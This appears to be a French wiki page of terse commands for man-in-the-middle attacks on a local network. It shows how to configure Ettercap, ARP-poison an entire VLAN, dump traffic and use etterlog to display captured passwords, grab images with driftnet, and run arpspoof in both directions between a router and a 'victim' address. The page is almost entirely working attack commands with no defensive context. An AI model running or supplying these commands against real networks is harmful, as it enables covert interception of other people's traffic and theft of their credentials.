MITM attacks

De UnixWiki
Aller à la navigation Aller à la recherche

Ettercap

Edit /etc/ettercap/etter.conf

Mettre à la place de la valeur par défaut

 ec_uid = 0                     
 ec_gid = 0

Et decommenter

  # if you use iptables:
  # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Capture tout le VLAN (bourrin)

 # ettercap -T -M arp -L dump ////

Pour logger

 # ettercap -T -M arp -L dump ////

Utiliser etterlog pour parser les logs

 # etterlog -p dump.eci (affiche les mot de passes)

Pour récupérer les images

 # driftnet -i etho

arpspoof

 # arpspoof -i interface -t IP.DU.ROUTEUR IP.DE.LA.VICTIME

On inverse l'operation dans un autre shell en même temps :

 # arpspoof -i interface -t IP.DE.LA.VICTIME IP.DU.ROUTEUR